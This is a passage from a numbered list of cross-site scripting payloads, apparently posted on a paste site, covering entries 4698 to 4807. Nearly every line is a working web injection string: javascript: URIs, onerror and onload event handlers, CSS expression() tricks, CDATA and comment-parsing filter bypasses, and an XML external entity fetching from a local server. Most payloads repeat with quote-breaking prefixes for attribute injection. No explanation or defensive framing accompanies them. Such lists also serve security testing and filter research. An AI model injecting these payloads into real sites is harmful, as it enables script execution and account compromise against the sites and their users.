  4698. <table background="javascript:alert(32)"></table>
  4699. "><table background="javascript:alert(32)"></table>
  4700. '><table background="javascript:alert(32)"></table>
  4701. <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(1)">XXX</a>
  4702. "><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(1)">XXX</a>
  4703. '><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(1)">XXX</a>
  4704. <![><img src="]><img src=x onerror=alert(1)//">
  4705. "><![><img src="]><img src=x onerror=alert(1)//">
  4706. '><![><img src="]><img src=x onerror=alert(1)//">
  4707. <svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(1)//"></svg>
  4708. "><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(1)//"></svg>
  4709. '><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(1)//"></svg>
  4710. <<style><img src="</style><img src=x onerror=alert(1)//">
  4711. "><<style><img src="</style><img src=x onerror=alert(1)//">
  4712. '><<style><img src="</style><img src=x onerror=alert(1)//">
  4713. "><style><img src="</style><img src=x onerror=alert(1)//">
  4714. '><style><img src="</style><img src=x onerror=alert(1)//">
  4715. <<li style=list-style:url() onerror=alert(1)></li>
  4716. "><<li style=list-style:url() onerror=alert(1)></li>
  4717. '><<li style=list-style:url() onerror=alert(1)></li>
  4718. <div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>
  4719. "><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>
  4720. '><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>
  4721. <video onerror="alert(1)"><source></source></video></div>
  4722. "><video onerror="alert(1)"><source></source></video></div>
  4723. '><video onerror="alert(1)"><source></source></video></div>
  4724. <b <script>alert(1)//</script>0</script></b>
  4725. "><b <script>alert(1)//</script>0</script></b>
  4726. '><b <script>alert(1)//</script>0</script></b></div>
  4727. "><b <script>alert(1)//</script>0</script></b></div>
  4728. '><b <script>alert(1)//</script>0</script></b></div>
  4729. <b><script<b></b><alert(1)</script </b></b>
  4730. "><b><script<b></b><alert(1)</script </b></b>
  4731. '><b><script<b></b><alert(1)</script </b></b></div>
  4732. "><b><script<b></b><alert(1)</script </b></b></div>
  4733. '><b><script<b></b><alert(1)</script </b></b></div>
  4734. <div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
  4735. "><div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
  4736. '><div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script></div>
  4737. "><div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script></div>
  4738. '><div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script></div>
  4739. <x '="foo"><x foo='><img src=x onerror=alert(1)//'>
  4740. "><x '="foo"><x foo='><img src=x onerror=alert(1)//'>
  4741. '><x '="foo"><x foo='><img src=x onerror=alert(1)//'>
  4742. <! '="foo"><x foo='><img src=x onerror=alert(1)//'>
  4743. "><! '="foo"><x foo='><img src=x onerror=alert(1)//'>
  4744. '><! '="foo"><x foo='><img src=x onerror=alert(1)//'>
  4745. <? '="foo"><x foo='><img src=x onerror=alert(1)//'>
  4746. "><? '="foo"><x foo='><img src=x onerror=alert(1)//'>
  4747. '><? '="foo"><x foo='><img src=x onerror=alert(1)//'>
  4748. <div id="1"><embed src="javascript:alert(1)">
  4749. "><embed src="javascript:alert(1)">
  4750. '><embed src="javascript:alert(1)"></embed>
  4751. <script src="javascript:alert(1)">
  4752. "><script src="javascript:alert(1)">
  4753. '><script src="javascript:alert(1)"></script>
  4754. "><script src="javascript:alert(1)"></script>
  4755. '><script src="javascript:alert(1)"></script>
  4756. <!DOCTYPE x[<!ENTITY x SYSTEM "http://127.0.0.1:3555/xss_serve_payloads/X.xxe">]><y>&x;</y>
  4757. "><!DOCTYPE x[<!ENTITY x SYSTEM "http://127.0.0.1:3555/xss_serve_payloads/X.xxe">]><y>&x;</y>
  4758. '><!DOCTYPE x[<!ENTITY x SYSTEM "http://127.0.0.1:3555/xss_serve_payloads/X.xxe">]><y>&x;</y>
  4759. <?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?>
  4760. "><?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?>
  4761. '><?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?>
  4762. onerror CDATA "alert(1)"
  4763. onload CDATA "alert(1)">
  4764. <html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x>
  4765. "><html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x>
  4766. '><html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x>
  4767. <card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>
  4768. "><card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>
  4769. '><card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>
  4770. <div style=width:1px;filter:glow onfilterchange=alert(1)>x
  4771. "><div style=width:1px;filter:glow onfilterchange=alert(1)>x
  4772. '><div style=width:1px;filter:glow onfilterchange=alert(1)>x
  4773. <// style=x:expression8alert(1)9>
  4774. "><// style=x:expression8alert(1)9>
  4775. '><// style=x:expression8alert(1)9>
  4776. <event-source src="index.php" onload="alert(1)">
  4777. "><event-source src="index.php" onload="alert(1)">
  4778. '><event-source src="index.php" onload="alert(1)">
  4779. <a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>
  4780. "><a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>
  4781. '><a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>
  4782. <?xml-stylesheet type="text/css"?><root style="x:expression(alert(1))"/>
  4783. "><?xml-stylesheet type="text/css"?><root style="x:expression(alert(1))"/>
  4784. '><?xml-stylesheet type="text/css"?><root style="x:expression(alert(1))"/>
  4785. <object allowscriptaccess="always" data="test.swf"></object>
  4786. "><object allowscriptaccess="always" data="test.swf"></object>
  4787. '><object allowscriptaccess="always" data="test.swf"></object>
  4788. <style>*{x:expression(alert(1))}</style>
  4789. "><style>*{x:expression(alert(1))}</style>
  4790. '><style>*{x:expression(alert(1))}</style>
  4791. <x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>
  4792. "><x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>
  4793. '><x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>
  4794. <?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(1));%7d"?>
  4795. "><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(1));%7d"?>
  4796. '><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(1));%7d"?>
  4797. <x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>
  4798. "><x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>
  4799. '><x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>
  4800. <x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>
  4801. "><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>
  4802. '><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>
  4803. <body oninput=alert(1)><input autofocus>
  4804. "><body oninput=alert(1)><input autofocus>
  4805. '><body oninput=alert(1)><input autofocus><div id="1"><svg xmlns="http://www.w3.org/2000/svg">
  4806. "><body oninput=alert(1)><input autofocus><div id="1"><svg xmlns="http://www.w3.org/2000/svg">
  4807. '><body oninput=alert(1)><input autofocus><div id="1"><svg xmlns="http://www.w3.org/2000/svg">
Add Comment
Please, Sign In to add comment